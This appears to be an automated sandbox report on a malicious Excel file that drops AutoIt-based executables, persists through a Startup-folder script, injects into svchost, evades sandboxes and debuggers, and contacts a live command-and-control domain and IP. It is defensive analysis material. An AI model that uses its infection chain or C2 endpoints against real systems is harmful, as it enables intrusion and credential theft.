          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wow64win.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wow64cpu.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mozglue.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dbghelp.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: msvcp140.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: vcruntime140.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ucrtbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wsock32.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: 202404294766578200.xlam.xlsxInitial sample: OLE zip file path = xl/media/image1.jpg
          Source: 202404294766578200.xlam.xlsxInitial sample: OLE zip file path = xl/calcChain.xml
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
          Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\GoogleJump to behavior
          Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\GoogleUpdaterJump to behavior
          Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\chrome_BITS_1564_1766989274Jump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
          Source: Binary string: wntdll.pdb source: Bactris.exe, 00000010.00000003.762094067.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, Bactris.exe, 00000010.00000003.761995898.0000000002B10000.00000004.00001000.00020000.00000000.sdmp
          Source: 202404294766578200.xlam.xlsxInitial sample: OLE indicators vbamacros = False
          Source: C:\Users\user\AppData\Roaming\YED.exeCode function: 3_2_002142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,3_2_002142DE
          Source: C:\Users\user\AppData\Roaming\YED.exeCode function: 3_3_029EFE76 push ecx; ret 3_3_029EFE89
          Source: C:\Users\user\AppData\Roaming\YED.exeCode function: 3_2_00230A76 push ecx; ret 3_2_00230A89
          Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exeCode function: 16_2_010A0A76 push ecx; ret 16_2_010A0A89
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_00457106 push ecx; ret 17_2_00457119
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0045B11A push esp; ret 17_2_0045B141
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0045E54D push esi; ret 17_2_0045E556
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_00457A28 push eax; ret 17_2_00457A46
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_00434E56 push ecx; ret 17_2_00434E69
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_10002806 push ecx; ret 17_2_10002819
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_00406EB0 ShellExecuteW,URLDownloadToFileW,17_2_00406EB0
          Source: C:\Users\user\AppData\Roaming\YED.exeFile created: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\YED.exeJump to dropped file

          Boot Survival

          barindex
          Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bactris.vbsJump to dropped file
          Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bactris.vbsJump to behavior
          Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bactris.vbsJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,17_2_0041AA4A
          Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exeCode function: 16_2_0109F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,16_2_0109F98E
          Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exeCode function: 16_2_01111C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,16_2_01111C41
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,17_2_0041CB50
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\YED.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\YED.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\YED.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\YED.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0040F7A7 Sleep,ExitProcess,17_2_0040F7A7
          Source: C:\Users\user\AppData\Roaming\YED.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_3-70888
          Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
          Source: C:\Windows\SysWOW64\svchost.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,17_2_0041A748
          Source: C:\Windows\SysWOW64\svchost.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
          Source: C:\Users\user\AppData\Roaming\YED.exeAPI coverage: 4.4 %
          Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exeAPI coverage: 4.6 %
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 808Thread sleep time: -120000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exe TID: 3596Thread sleep time: -180000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exe TID: 3920Thread sleep time: -120000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Roaming\YED.exeCode function: 3_2_0027DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,3_2_0027DBBE
          Source: C:\Users\user\AppData\Roaming\YED.exeCode function: 3_2_0024C2A2 FindFirstFileExW,3_2_0024C2A2
          Source: C:\Users\user\AppData\Roaming\YED.exeCode function: 3_2_002868EE FindFirstFileW,FindClose,3_2_002868EE
          Source: C:\Users\user\AppData\Roaming\YED.exeCode function: 3_2_0028698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,3_2_0028698F
          Source: C:\Users\user\AppData\Roaming\YED.exeCode function: 3_2_0027D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,3_2_0027D076
          Source: C:\Users\user\AppData\Roaming\YED.exeCode function: 3_2_0027D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,3_2_0027D3A9
          Source: C:\Users\user\AppData\Roaming\YED.exeCode function: 3_2_00289642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,3_2_00289642
          Source: C:\Users\user\AppData\Roaming\YED.exeCode function: 3_2_0028979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,3_2_0028979D
          Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exeCode function: 16_2_010EDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,16_2_010EDBBE
          Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exeCode function: 16_2_010BC2A2 FindFirstFileExW,16_2_010BC2A2
          Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exeCode function: 16_2_010F698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,16_2_010F698F
          Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exeCode function: 16_2_010F68EE FindFirstFileW,FindClose,16_2_010F68EE
          Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exeCode function: 16_2_010ED076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,16_2_010ED076
          Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exeCode function: 16_2_010ED3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,16_2_010ED3A9
          Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exeCode function: 16_2_010F979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,16_2_010F979D
          Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exeCode function: 16_2_010F9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,16_2_010F9642
          Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exeCode function: 16_2_010F9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,16_2_010F9B2B
          Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exeCode function: 16_2_010F5C97 FindFirstFileW,FindNextFileW,FindClose,16_2_010F5C97
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,17_2_00409253
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,17_2_0041C291
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,17_2_0040C34D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,17_2_00409665
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0044E879 FindFirstFileExA,17_2_0044E879
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,17_2_0040880C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0040783C FindFirstFileW,FindNextFileW,17_2_0040783C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,17_2_00419AF5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,17_2_0040BB30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,17_2_0040BD37
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,17_2_100010F1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_10006580 FindFirstFileExA,17_2_10006580
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,17_2_00407C97
          Source: C:\Users\user\AppData\Roaming\YED.exeCode function: 3_2_002142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,3_2_002142DE
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Jump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end nodegraph_2-5273
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end nodegraph_2-4996
          Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\YED.exeCode function: 3_2_0028EAA2 BlockInput,3_2_0028EAA2
          Source: C:\Users\user\AppData\Roaming\YED.exeCode function: 3_2_00242622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00242622
          Source: C:\Users\user\AppData\Roaming\YED.exeCode function: 3_2_002142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,3_2_002142DE
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035006C3 mov edx, dword ptr fs:[00000030h]2_2_035006C3
          Source: C:\Users\user\AppData\Roaming\YED.exeCode function: 3_3_029F40E8 mov eax, dword ptr fs:[00000030h]3_3_029F40E8
          Source: C:\Users\user\AppData\Roaming\YED.exeCode function: 3_2_00234CE8 mov eax, dword ptr fs:[00000030h]3_2_00234CE8
          Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exeCode function: 16_2_010A4CE8 mov eax, dword ptr fs:[00000030h]16_2_010A4CE8
          Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exeCode function: 16_2_00113530 mov eax, dword ptr fs:[00000030h]16_2_00113530
          Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exeCode function: 16_2_00113590 mov eax, dword ptr fs:[00000030h]16_2_00113590
          Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exeCode function: 16_2_00111EF0 mov eax, dword ptr fs:[00000030h]16_2_00111EF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_004432B5 mov eax, dword ptr fs:[00000030h]17_2_004432B5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_10004AB4 mov eax, dword ptr fs:[00000030h]17_2_10004AB4
          Source: C:\Users\user\AppData\Roaming\YED.exeCode function: 3_2_00270B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,3_2_00270B62
          Source: C:\Windows\SysWOW64\svchost.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\AppData\Roaming\YED.exeCode function: 3_2_002309D5 SetUnhandledExceptionFilter,3_2_002309D5
          Source: C:\Users\user\AppData\Roaming\YED.exeCode function: 3_2_00242622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00242622
          Source: C:\Users\user\AppData\Roaming\YED.exeCode function: 3_2_0023083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0023083F
          Source: C:\Users\user\AppData\Roaming\YED.exeCode function: 3_2_00230C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00230C21
          Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exeCode function: 16_2_010A09D5 SetUnhandledExceptionFilter,16_2_010A09D5
          Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exeCode function: 16_2_010B2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_010B2622
          Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exeCode function: 16_2_010A083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_010A083F
          Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exeCode function: 16_2_010A0C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_010A0C21
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_00434B47 SetUnhandledExceptionFilter,17_2_00434B47
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_004349F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0043BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_0043BB22
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_00434FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,17_2_00434FDC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_100060E2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_10002639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_10002639
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_10002B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,17_2_10002B1C

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 23.94.53.100 2766Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeDomain query: geoplugin.net
          Source: C:\Windows\SysWOW64\svchost.exeDomain query: yuahdgbceja.sytes.net
          Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 178.237.33.50 80Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_004180EF GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,17_2_004180EF
          Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 7EFDE008Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe17_2_004120F7
          Source: C:\Users\user\AppData\Roaming\YED.exeCode function: 3_2_00271201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,3_2_00271201
          Source: C:\Users\user\AppData\Roaming\YED.exeCode function: 3_2_00252BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,3_2_00252BA5
          Source: C:\Users\user\AppData\Roaming\YED.exeCode function: 3_2_0027B226 SendInput,keybd_event,3_2_0027B226
          Source: C:\Users\user\AppData\Roaming\YED.exeCode function: 3_2_002922DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,3_2_002922DA
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\YED.exe C:\Users\user\AppData\Roaming\YED.exeJump to behavior
          Source: C:\Users\user\AppData\Roaming\YED.exeProcess created: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe C:\Users\user\AppData\Roaming\YED.exeJump to behavior
          Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Users\user\AppData\Roaming\YED.exeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\qcbxbnrr"Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\seghufctinb"Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\dyuauqnmwvtskce"Jump to behavior
          Source: C:\Users\user\AppData\Roaming\YED.exeCode function: 3_2_00270B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,3_2_00270B62
          Source: C:\Users\user\AppData\Roaming\YED.exeCode function: 3_2_00271663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,3_2_00271663
          Source: YED.exe, 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmp, YED.exe, 00000003.00000003.756895707.0000000002A91000.00000004.00001000.00020000.00000000.sdmp, Bactris.exe, 00000010.00000000.760231345.0000000001142000.00000002.00000001.01000000.00000004.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
          Source: YED.exe, Bactris.exeBinary or memory string: Shell_TrayWnd
          Source: svchost.exe, 00000011.00000002.783667001.0000000000914000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
          Source: svchost.exe, 00000011.00000002.783667001.0000000000914000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [Program Manager]
          Source: C:\Users\user\AppData\Roaming\YED.exeCode function: 3_3_029EFA98 cpuid 3_3_029EFA98
